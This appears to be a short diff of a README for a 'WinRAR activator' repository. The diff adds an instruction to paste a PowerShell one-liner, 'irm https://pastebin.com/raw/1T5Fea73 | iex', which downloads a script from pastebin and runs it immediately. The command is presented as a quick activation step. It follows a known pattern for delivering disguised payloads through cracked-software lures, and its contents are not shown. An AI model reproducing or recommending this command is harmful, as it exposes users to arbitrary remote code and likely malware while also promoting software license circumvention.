Fraknek/WinRAR-activator/README.md

 # WinRAR-activator
-just WinRAR activator in python
+Just WinRAR activator in python

+Use this for fast activation irm https://pastebin.com/raw/1T5Fea73 | iex